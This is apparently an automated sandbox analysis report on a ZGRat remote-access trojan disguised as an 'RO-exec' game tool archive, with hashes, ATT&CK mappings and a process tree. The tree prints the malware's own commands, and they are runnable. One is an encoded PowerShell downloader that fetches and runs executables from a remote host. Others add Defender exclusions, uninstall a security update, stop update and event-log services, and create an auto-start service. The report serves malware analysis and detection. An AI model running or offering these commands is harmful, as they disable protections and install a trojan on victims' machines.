zgrat | 1d5550a21ad07ce2b2916954ed7951a80907aec0a0600a7566f9af51d0ee05ea

Analysis

max time kernel
63s
max time network
93s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
28/03/2024, 18:02

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

RO-exec free remake v2.0.rar
Size

2.3MB
MD5

6c9773de202cfd6bcafdbb2fc8f081b8
SHA1

d2a470f21d6e50499179ce5ee711db8b2ab3ce34
SHA256

1d5550a21ad07ce2b2916954ed7951a80907aec0a0600a7566f9af51d0ee05ea
SHA512

7904791097af7f413ef957ec226fd9561b0da50d2b67e2da27b487e423c35cf4bf975dae300a13e016ffde166eba47805fffb411370147916769ba3208e69c65
SSDEEP

49152:IzPBa6jIVq9I02Wwv5mxGOqfadevtu3k2WLrwLyZMkdi43rr7s:2B49HWcYdwade1ek2WeyZMQiojs

Score

10^/10

zgrat evasion persistence rat

Malware Config

Signatures

Detect ZGRat V1 4 IoCs

resource	yara_rule
behavioral1/files/0x0007000000023218-108.dat	family_zgrat_v1
behavioral1/files/0x0007000000023218-118.dat	family_zgrat_v1
behavioral1/memory/3424-120-0x0000000000750000-0x0000000000954000-memory.dmp	family_zgrat_v1
behavioral1/files/0x0007000000023218-119.dat	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	RO-exec_Launcher.exe

Executes dropped EXE 1 IoCs

pid	Process
4644	RO-exec_Launcher.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
4644	RO-exec_Launcher.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5112	sc.exe
3152	sc.exe
3504	sc.exe
4364	sc.exe
3964	sc.exe
548	sc.exe
4848	sc.exe
396	sc.exe
3336	sc.exe
2472	sc.exe
908	sc.exe
512	sc.exe
3216	sc.exe
4796	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
528	7zFM.exe
528	7zFM.exe
3892	powershell.exe
3892	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
528	7zFM.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeRestorePrivilege	528	7zFM.exe
Token: 35	528	7zFM.exe
Token: SeSecurityPrivilege	528	7zFM.exe
Token: SeDebugPrivilege	3892	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
528	7zFM.exe
528	7zFM.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4644	RO-exec_Launcher.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2128 wrote to memory of 528	2128	cmd.exe	86
PID 2128 wrote to memory of 528	2128	cmd.exe	86
PID 528 wrote to memory of 4644	528	7zFM.exe	101
PID 528 wrote to memory of 4644	528	7zFM.exe	101
PID 528 wrote to memory of 4644	528	7zFM.exe	101
PID 4644 wrote to memory of 3892	4644	RO-exec_Launcher.exe	102
PID 4644 wrote to memory of 3892	4644	RO-exec_Launcher.exe	102
PID 4644 wrote to memory of 3892	4644	RO-exec_Launcher.exe	102

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\RO-exec free remake v2.0.rar"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2128
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RO-exec free remake v2.0.rar"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:528
- - C:\Users\Admin\AppData\Local\Temp\7zO0128BE27\RO-exec_Launcher.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO0128BE27\RO-exec_Launcher.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4644
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAeABqACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABxAG0AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcABpAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBzAGwAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBOAGUAegB1AHIALgBlAHgAZQAnACwAIAA8ACMAYQB4AG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBxAHIAawAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAHkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBOAGUAegB1AHIALgBlAHgAZQAnACkAKQA8ACMAYwB6AHcAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAHIAZQBtAG8AdABlAC8AcgBiAEgAeQBwAGUAcgBzAHUAcgByAG8AZwBhAHQAZQBzAGEAdgBlAHMARABoAGMAcAAuAGUAeABlACcALAAgADwAIwB4AHAAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAbABoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGgAcABrACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHIAYgBIAHkAcABlAHIAcwB1AHIAcgBvAGcAYQB0AGUAcwBhAHYAZQBzAEQAaABjAHAALgBlAHgAZQAnACkAKQA8ACMAZQBwAHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAG0ALwBjAG8AbgBoAG8AcwB0AHMAeQBuAC4AZQB4AGUAJwAsACAAPAAjAGcAbgBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQBnAHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZQBxAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAHkAbgAuAGUAeABlACcAKQApADwAIwBxAHkAdAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGUAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbgBzAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATgBlAHoAdQByAC4AZQB4AGUAJwApADwAIwB6AHgAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAHMAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZgB6AGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcgBiAEgAeQBwAGUAcgBzAHUAcgByAG8AZwBhAHQAZQBzAGEAdgBlAHMARABoAGMAcAAuAGUAeABlACcAKQA8ACMAaABsAGEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBkAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHQAeABlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbwBuAGgAbwBzAHQAcwB5AG4ALgBlAHgAZQAnACkAPAAjAGMAegBpACMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3892
    - - C:\Users\Admin\AppData\Roaming\Nezur.exe
        
        "C:\Users\Admin\AppData\Roaming\Nezur.exe"
        5⤵
        
        PID:312
    - - C:\Users\Admin\AppData\Roaming\rbHypersurrogatesavesDhcp.exe
        
        "C:\Users\Admin\AppData\Roaming\rbHypersurrogatesavesDhcp.exe"
        5⤵
        
        PID:4604
      - C:\Users\Admin\AppData\Roaming\.rbHypersurrogatesavesDhcp.exe
        
        "C:\Users\Admin\AppData\Roaming\.rbHypersurrogatesavesDhcp.exe"
        6⤵
        
        PID:3424
    - - C:\Users\Admin\AppData\Roaming\conhostsyn.exe
        
        "C:\Users\Admin\AppData\Roaming\conhostsyn.exe"
        5⤵
        
        PID:2864
      - C:\Users\Admin\AppData\Roaming\.conhostsyn.exe
        
        "C:\Users\Admin\AppData\Roaming\.conhostsyn.exe"
        6⤵
        
        PID:1732
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        7⤵
        
        PID:2928
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:5004
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        8⤵
        
        PID:4664
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:4848
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:5112
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:3504
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        7⤵
        Launches sc.exe
        
        PID:4364
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        7⤵
        Launches sc.exe
        
        PID:396
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        7⤵
        
        PID:2520
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        7⤵
        
        PID:2388
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        7⤵
        
        PID:4256
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        7⤵
        
        PID:3544
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "driverupdate"
        7⤵
        Launches sc.exe
        
        PID:4796
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
        7⤵
        Launches sc.exe
        
        PID:3216
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        7⤵
        Launches sc.exe
        
        PID:3964
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "driverupdate"
        7⤵
        Launches sc.exe
        
        PID:512

C:\ProgramData\VC_redist.x64.exe
C:\ProgramData\VC_redist.x64.exe
1⤵
PID:2532
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  PID:4404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2204
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4832
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:3336
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:908
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:3152
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:548
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2472
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:3724
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:3260
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:1496
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:4672
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:4260

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\VC_redist.x64.exe

Filesize
56.7MB

MD5
d36596486f1a7f862bdf695499a790c6

SHA1
657c7b7415fcd5a1c56215cd0edcb2385dae1313

SHA256
ffcdc76f77a7202b472a0c276e7ff3eb784476dce5daf2b5dc21457a993418b5

SHA512
20228a1f12a21201612bb15a6bb7d309f7ce8978c4e71395030e05653cb01ba8664004998438646cdccbff8d14b5c281bd4656ff331d38b3f5d92b389a6e3fb3

Download Submit
C:\ProgramData\VC_redist.x64.exe

Filesize
56.2MB

MD5
20c7dcb29edea2212715e9c7d6c80264

SHA1
bb79d63b840f712308168635b785ee2d0f2d89eb

SHA256
50cef336690ba3964f88175688ba61671f9ec67de89491009e54d7310bbb2f48

SHA512
9024d9d9bb88a95a608afdf6f7ae843e40cd243ca7d5f837e81b9a608c15a11d9479091df60ca3d4aa2a7d85d77d55d18874e96b6fac6c2cc1232cc39f33f545

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
098ca517a276e3c79a3d47e4edbace76

SHA1
635424715e7a01a528db7cba24be42ced59b5cca

SHA256
0216103344fc8e9b42c6745925d4181a166116f7c142ad68c3c2181f07bc3810

SHA512
859f69235455d06f91c097d5f9151025e5b1d736094e103f0f33cda54b24cee08ac4ebb739145ae8f3c4e9b161c37ab64ceb2a27850c32f889292cd0a0eaf313

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO0128BE27\RO-exec_Launcher.exe

Filesize
2.3MB

MD5
ee091b0aff43b9506fbc384642f44275

SHA1
1f0328c27b1dcbc3bc726ab5a2fa7cafc89c0ac5

SHA256
b1b4c0259825fa79fe6176502cd6900ec7411687981f8e5d9738edbd83fd9dca

SHA512
06ca311ea0db212ffeb834bd703a5e545ff69e196f7973f108248361f253d91342b431fa895b516bf54fd15c91eebcd2a4a4132560bfd2ec05310cd8217c2e00

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qczxioqe.ubo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\.conhostsyn.exe

Filesize
100.3MB

MD5
e2d42c21251d0921c7231c329bd7a266

SHA1
8f9670070f521f599c65e9371ef9bda3e75b34aa

SHA256
11baacf04bd53d9f23ca4e536b43cf31ba2822091fe2a76942051bb5192104ce

SHA512
e52239b603f01ad568c0d6808e2751372592fc6c21297afc67ddf8095e76f0cb7fe6e44f31a253f9453ef48f0e2cb83b12b9bb900674b150f0c5f50fc2fe4bb3

Download Submit
C:\Users\Admin\AppData\Roaming\.conhostsyn.exe

Filesize
92.6MB

MD5
9d8737d4ac0fcb7b9dea837c85b6d44b

SHA1
b600f991216e21bfffd42b7e94f16c855cffd0ea

SHA256
050dd00ecf8feb56f86aa6c214dd769c3af30234ec19a54e78ffad5aafd92d0b

SHA512
6e5c5a5da93592fa4e58b437a7f237022819235dd1c7b5abe77566e7bf771013c2e89bc52ff6334e6a7178f4af4f86d490f95bbbe2d3b452e65987d53a8d0f29

Download Submit
C:\Users\Admin\AppData\Roaming\.conhostsyn.exe

Filesize
90.9MB

MD5
5a8b2a30441e868ff9ce0375d664581a

SHA1
d11fc1b756301208d233f2c2466b4a289c23a049

SHA256
594b47c8896eab05836ef276f6c018fcd5a33de4c60689c2836ceb5a2cab8ed2

SHA512
93f846600e07aa002d10baae340f735cdf8b8576db843e97ed9f649d10bc239c51b1b9785c19e9716ca5dc2e25392d12fae07688cb09fd70240d807ed9b3b749

Download Submit
C:\Users\Admin\AppData\Roaming\.rbHypersurrogatesavesDhcp.exe

Filesize
101.4MB

MD5
6d3eccd1b9a7eb0ae67332a968e6eaf3

SHA1
488142799e4494cf7c87004dbd3e80611fdbdf4a

SHA256
e3d70c74f4166ef0e633b5047ba33abc881cd96cff41779af0e5cddd26f164c6

SHA512
f0936979ac26de7b14e7fa3a7dddb203726b380b350c083de80dd93058c3bd75d801cf4a267cb09f1719f1873cc54ce19470cf53fea4ec35d4dee2fb48eb9554

Download Submit
C:\Users\Admin\AppData\Roaming\.rbHypersurrogatesavesDhcp.exe

Filesize
94.2MB

MD5
5fe7fbe9b67dd9b1ea6530eccc3e71e2

SHA1
a93ec1a310f7e2761c49a785efe126da3069cbb0

SHA256
62678e14ef856de6dac6c8b2fb5541a4a0e8c69d9feca0c66d1ebd39a0a26e8b

SHA512
7b88e953cf17419624dcdd8e4f227575077b6cfacb57c93c737e7dd70d80630b8de9e92ae31eaaba20a728b56d7eb9b52d24183d784ac4e0d77cd4688ac79c6c

Download Submit
C:\Users\Admin\AppData\Roaming\.rbHypersurrogatesavesDhcp.exe

Filesize
92.9MB

MD5
1d554a6580c61a9a33c5f442f595e985

SHA1
0ad24bfecb627b874d4d3b9b4dc54c18e061d417

SHA256
306da311f894046155b9eee3e655c40304c20925ca9bd36db5a1f288ab2d5530

SHA512
1424b7a3b800f5a1905a17fb45943a4eac20aec09a2040d697f05cae0a6f15bffa83c51fbf4072d6af0057d6199fb7779f68326aa4965569d1fa673d9628a5cb

Download Submit
C:\Users\Admin\AppData\Roaming\Nezur.exe

Filesize
2.1MB

MD5
d6f133dee71ed4c119a2d2aaf4cf3a69

SHA1
d31a9b77e1eb1308c6c686e7b1715999ad18019b

SHA256
3c1ada57fbbe1a5fe4e56ab89545f9c38b888676ef303ffb2934d289937af83d

SHA512
8ef3020a156a4ffa978b89336a04c3ea3498912680e7cb5b9348d5884812bf456c8e739fba8b81d48e5234a1627e15bb5ddc2c014c5ff1c00088ab6373ce9381

Download Submit
C:\Users\Admin\AppData\Roaming\conhostsyn.exe

Filesize
3.1MB

MD5
912ff4e169ed2797eb2811d53fa32b21

SHA1
1d30a58c1361f30b000a7a6178020562ea51c9e8

SHA256
6d501a4c31103b36ffed7f94f5db1041b664e0aed3e94fb868a94740180a1ede

SHA512
a566a82d7230282ff477c5abfcfdc3c6fb6a4f3064b6f7ab3aef712bfe118460262ecbe69640c6e3c39b6b9eeebf6ff60c6aea9486342eef55f6f7e9dd086427

Download Submit
C:\Users\Admin\AppData\Roaming\rbHypersurrogatesavesDhcp.exe

Filesize
2.7MB

MD5
523863b176989e0d286668451fad4451

SHA1
e82feee7b13e153231fb9792772f59f4d37b9101

SHA256
3753a3d6ce56f07f97f30a1a9577a7e9ecc324fc6c11508ac6fad7b907553390

SHA512
d19265f18aac97d8515716d530cf149b068b80fa82bab425890b160b2a8b2016e47a480bd187bb66496aa593fb2513bf2b5b1147d7489a5b8fa3a80ac8b964e4

Download Submit
memory/3424-147-0x00007FFE1FB50000-0x00007FFE1FB51000-memory.dmp

Filesize
4KB

Download
memory/3424-154-0x000000001B5D0000-0x000000001B5E0000-memory.dmp

Filesize
64KB

Download
memory/3424-126-0x000000001B550000-0x000000001B55E000-memory.dmp

Filesize
56KB

Download
memory/3424-129-0x000000001B580000-0x000000001B59C000-memory.dmp

Filesize
112KB

Download
memory/3424-130-0x00007FFE1FD70000-0x00007FFE1FE2E000-memory.dmp

Filesize
760KB

Download
memory/3424-131-0x00007FFE1FBB0000-0x00007FFE1FBB1000-memory.dmp

Filesize
4KB

Download
memory/3424-132-0x000000001B5D0000-0x000000001B5E0000-memory.dmp

Filesize
64KB

Download
memory/3424-136-0x000000001B5A0000-0x000000001B5B8000-memory.dmp

Filesize
96KB

Download
memory/3424-137-0x00007FFE1FB90000-0x00007FFE1FB91000-memory.dmp

Filesize
4KB

Download
memory/3424-153-0x00007FFE02890000-0x00007FFE03351000-memory.dmp

Filesize
10.8MB

Download
memory/3424-155-0x000000001B5D0000-0x000000001B5E0000-memory.dmp

Filesize
64KB

Download
memory/3424-139-0x000000001B560000-0x000000001B56E000-memory.dmp

Filesize
56KB

Download
memory/3424-145-0x00007FFE1FB70000-0x00007FFE1FB71000-memory.dmp

Filesize
4KB

Download
memory/3424-149-0x000000001B7E0000-0x000000001B7EE000-memory.dmp

Filesize
56KB

Download
memory/3424-151-0x000000001B7F0000-0x000000001B7FC000-memory.dmp

Filesize
48KB

Download
memory/3424-152-0x00007FFE1FB40000-0x00007FFE1FB41000-memory.dmp

Filesize
4KB

Download
memory/3424-146-0x00007FFE1FB60000-0x00007FFE1FB61000-memory.dmp

Filesize
4KB

Download
memory/3424-144-0x00007FFE1FB80000-0x00007FFE1FB81000-memory.dmp

Filesize
4KB

Download
memory/3424-143-0x000000001B5C0000-0x000000001B5CC000-memory.dmp

Filesize
48KB

Download
memory/3424-141-0x000000001B570000-0x000000001B57E000-memory.dmp

Filesize
56KB

Download
memory/3424-133-0x000000001B830000-0x000000001B880000-memory.dmp

Filesize
320KB

Download
memory/3424-134-0x00007FFE1FBA0000-0x00007FFE1FBA1000-memory.dmp

Filesize
4KB

Download
memory/3424-127-0x00007FFE1FD70000-0x00007FFE1FE2E000-memory.dmp

Filesize
760KB

Download
memory/3424-124-0x000000001B5D0000-0x000000001B5E0000-memory.dmp

Filesize
64KB

Download
memory/3424-122-0x000000001B390000-0x000000001B391000-memory.dmp

Filesize
4KB

Download
memory/3424-123-0x000000001B5D0000-0x000000001B5E0000-memory.dmp

Filesize
64KB

Download
memory/3424-121-0x00007FFE02890000-0x00007FFE03351000-memory.dmp

Filesize
10.8MB

Download
memory/3424-120-0x0000000000750000-0x0000000000954000-memory.dmp

Filesize
2.0MB

Download
memory/3892-56-0x0000000007CE0000-0x000000000835A000-memory.dmp

Filesize
6.5MB

Download
memory/3892-57-0x0000000007400000-0x000000000741A000-memory.dmp

Filesize
104KB

Download
memory/3892-19-0x0000000002CE0000-0x0000000002D16000-memory.dmp

Filesize
216KB

Download
memory/3892-20-0x0000000074550000-0x0000000074D00000-memory.dmp

Filesize
7.7MB

Download
memory/3892-26-0x0000000005BB0000-0x0000000005C16000-memory.dmp

Filesize
408KB

Download
memory/3892-94-0x0000000074550000-0x0000000074D00000-memory.dmp

Filesize
7.7MB

Download
memory/3892-37-0x0000000005E80000-0x00000000061D4000-memory.dmp

Filesize
3.3MB

Download
memory/3892-24-0x0000000005510000-0x0000000005B38000-memory.dmp

Filesize
6.2MB

Download
memory/3892-25-0x0000000005410000-0x0000000005432000-memory.dmp

Filesize
136KB

Download
memory/3892-39-0x00000000062E0000-0x000000000632C000-memory.dmp

Filesize
304KB

Download
memory/3892-66-0x0000000008910000-0x0000000008EB4000-memory.dmp

Filesize
5.6MB

Download
memory/3892-65-0x00000000079A0000-0x00000000079C2000-memory.dmp

Filesize
136KB

Download
memory/3892-61-0x0000000007840000-0x000000000784E000-memory.dmp

Filesize
56KB

Download
memory/3892-64-0x0000000007880000-0x0000000007888000-memory.dmp

Filesize
32KB

Download
memory/3892-63-0x0000000007890000-0x00000000078AA000-memory.dmp

Filesize
104KB

Download
memory/3892-62-0x0000000007850000-0x0000000007864000-memory.dmp

Filesize
80KB

Download
memory/3892-60-0x0000000007800000-0x0000000007811000-memory.dmp

Filesize
68KB

Download
memory/3892-38-0x00000000062B0000-0x00000000062CE000-memory.dmp

Filesize
120KB

Download
memory/3892-40-0x000000007F620000-0x000000007F630000-memory.dmp

Filesize
64KB

Download
memory/3892-58-0x0000000007670000-0x000000000767A000-memory.dmp

Filesize
40KB

Download
memory/3892-22-0x0000000002DC0000-0x0000000002DD0000-memory.dmp

Filesize
64KB

Download
memory/3892-42-0x0000000074DC0000-0x0000000074E0C000-memory.dmp

Filesize
304KB

Download
memory/3892-59-0x00000000078D0000-0x0000000007966000-memory.dmp

Filesize
600KB

Download
memory/3892-41-0x0000000007260000-0x0000000007292000-memory.dmp

Filesize
200KB

Download
memory/3892-27-0x0000000005C90000-0x0000000005CF6000-memory.dmp

Filesize
408KB

Download
memory/3892-52-0x0000000006890000-0x00000000068AE000-memory.dmp

Filesize
120KB

Download
memory/3892-53-0x0000000002DC0000-0x0000000002DD0000-memory.dmp

Filesize
64KB

Download
memory/3892-54-0x0000000002DC0000-0x0000000002DD0000-memory.dmp

Filesize
64KB

Download
memory/3892-55-0x00000000072B0000-0x0000000007353000-memory.dmp

Filesize
652KB

Download
memory/4260-221-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4260-227-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4260-225-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4260-223-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4260-224-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4260-222-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4644-23-0x0000000074550000-0x0000000074D00000-memory.dmp

Filesize
7.7MB

Download
memory/4644-15-0x0000000000FE0000-0x000000000198A000-memory.dmp

Filesize
9.7MB

Download
memory/4644-21-0x000000007EC00000-0x000000007EFD1000-memory.dmp

Filesize
3.8MB

Download
memory/4644-13-0x000000007EC00000-0x000000007EFD1000-memory.dmp

Filesize
3.8MB

Download
memory/4644-18-0x0000000000FE0000-0x000000000198A000-memory.dmp

Filesize
9.7MB

Download
memory/4644-12-0x0000000000FE0000-0x000000000198A000-memory.dmp

Filesize
9.7MB

Download
memory/4644-16-0x0000000000FE0000-0x000000000198A000-memory.dmp

Filesize
9.7MB

Download
